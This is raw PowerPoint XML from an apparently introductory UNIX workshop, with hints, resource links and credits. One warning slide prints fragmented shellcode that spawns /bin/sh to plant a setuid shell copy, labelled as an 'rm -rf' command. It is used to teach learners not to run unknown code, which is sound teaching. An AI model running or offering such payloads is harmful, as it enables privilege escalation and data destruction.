          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>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esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[] __attribute__ ((section(“.text”))) /* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>e.s.p</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release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xeb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\x3e\x5b\x31\xc0\x50\x54\x5a\x83\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\x64\x68”</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\x68\</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\xd0\</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\xd9\x68\x8d\x99”</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\x81\x68\x8d\x92\</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\xd2\x54\x5e\xf7\x16\xf7”</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“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56”</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“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\x80\x31”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“\xc0\x40\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xeb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\xf9\xe8\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xbd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\x2f\x62\x69”</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“\x6e\x2f\x73\x68\x00\x2d\x63\x00”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cp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -p /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sh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/.beyond; </a:t>
            </a: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4755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/.beyond;”;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Down Arrow 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1390324">
            <a:off x="4212865" y="2005546"/>
            <a:ext cx="2370823" cy="170159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48515" y="690415"/>
            <a:ext cx="3120390" cy="2000548"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>THIS IS THE HEXADECIMAL CODE FOR </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000"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72378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Hints</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>When describing a path to an/application:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>this/is/path/to/the/file.txt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>For our purposes, “folder” and “directory” refer to the same thing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>In PowerPoint, commands you will type will look</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>like this</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36266007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Are Not Sure What Code From the Internet Will Do…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Google it before you run it!!!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="927"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2128838" y="2718103"/>
            <a:ext cx="4886324" cy="3936855"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19593748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NEVER Copy and Paste Code from the Internet Directly Into the Console!!!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Not Evil</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Git Repository Copy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ALWAYS paste into a text file FIRST to see what you ACTUALLY copied…</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0068812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 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Asking Questions Online</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>StackExchange</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>unix.stackexchange.com</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LinuxQuestions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.linuxquestions.org/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2443384"/>
            <a:ext cx="9144000" cy="2911011"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18364063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 Guides</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux Cookbook: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.dsl.org/cookbook/cookbook_toc.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux Command:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.linuxcommand.org/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Computer Hope:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.computerhope.com/unix/top.htm</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24130350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Get Discouraged</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="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7" y="2007510"/>
            <a:ext cx="6791325" cy="21812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58637" y="4188736"/>
            <a:ext cx="1563248" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>https://xkcd.com/1168/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="4729397"/>
            <a:ext cx="7886700" cy="1447566"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>This stuff can be complicated, even for people who’ve been doing it for years.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Ask for help if you need it!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39723239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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Questions?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Please fill out survey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>goo.gl/forms/0atRg9YsBC98jMSP2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These surveys help us improve workshops for future attendees!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5700889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Credits</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="55000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is UNIX?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mac OS X: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.macxdvd.com/mac-dvd-video-converter-how-to/article-image/mac-os-x.png</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>iOS logo: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.degree53.com/~/media/images/services/ios.ashx?h=500&amp;la=en&amp;w=500</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Orbis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> OS: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://media.psu.com/media/articles/image/orbis2.png</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Chrome logo: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://upload.wikimedia.org/wikipedia/en/thumb/d/d0/Chrome_Logo.svg/1024px-Chrome_Logo.svg.png</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Android logo: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://static.giantbomb.com/uploads/original/15/157771/2312719-a6.jpg</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux logos: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>http://1.bp.blogspot.com/-kkEEYNqfWmg/VppqCU65AGI/AAAAAAAACp8/bY-udsWhJek/s1600/1448026963685.png</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UNIX Philosophy: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>http://www.azquotes.com/picture-quotes/quote-this-is-the-unix-philosophy-write-programs-that-do-one-thing-and-do-it-well-write-programs-douglas-mcilroy-81-95-07.jpg</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Why Learn UNIX?: ccbgm.Illinois.edu</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lesson 0.5: Secure Shell (SSH): </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Laptop: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>https://img.clipartfest.com/04bed964c916ac933048f4aa6d9336f9_laptop-computer-clipart-free-clip-art-computer_6654-5300.png</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>https://img.clipartfest.com/473f0cf2f99c530d23c66dcb7e26acc1_server-clipart-server-computer-clipart_1791-2400.png</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Things You Should Never, EVER, Do on a UNIX System:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Foot: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>https://islascruz.org/blog/wp-content/uploads/2015/07/IMG_0455.jpg</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>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5778669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19712</TotalTime>
  <Words>4101</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>700</Paragraphs>
  <Slides>96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96</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="101" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Introduction to UNIX</vt:lpstr>
      <vt:lpstr>Thanks!</vt:lpstr>
      <vt:lpstr>Overview</vt:lpstr>
      <vt:lpstr>BCBGSO</vt:lpstr>
      <vt:lpstr>Materials</vt:lpstr>
      <vt:lpstr>What is UNIX?</vt:lpstr>
      <vt:lpstr>UNIX Philosophy</vt:lpstr>
      <vt:lpstr>Why Learn UNIX?</vt:lpstr>
      <vt:lpstr>Helpful Hints</vt:lpstr>
      <vt:lpstr>Lesson 0:  Background/Getting Started</vt:lpstr>
      <vt:lpstr>Lesson 0.1:  GUIs and Command Lines</vt:lpstr>
      <vt:lpstr>Lesson 0.1: GUIs and Command Lines</vt:lpstr>
      <vt:lpstr>Lesson 0.1:  GUIs and Command Lines</vt:lpstr>
      <vt:lpstr>Lesson 0.1: GUIs and Command Lines</vt:lpstr>
      <vt:lpstr>Lesson 0.2:  Opening a Terminal Session on a Mac</vt:lpstr>
      <vt:lpstr>Lesson 0.3:  Opening a Terminal Session in Windows</vt:lpstr>
      <vt:lpstr>Lesson 0.4: SecureShell (SSH)</vt:lpstr>
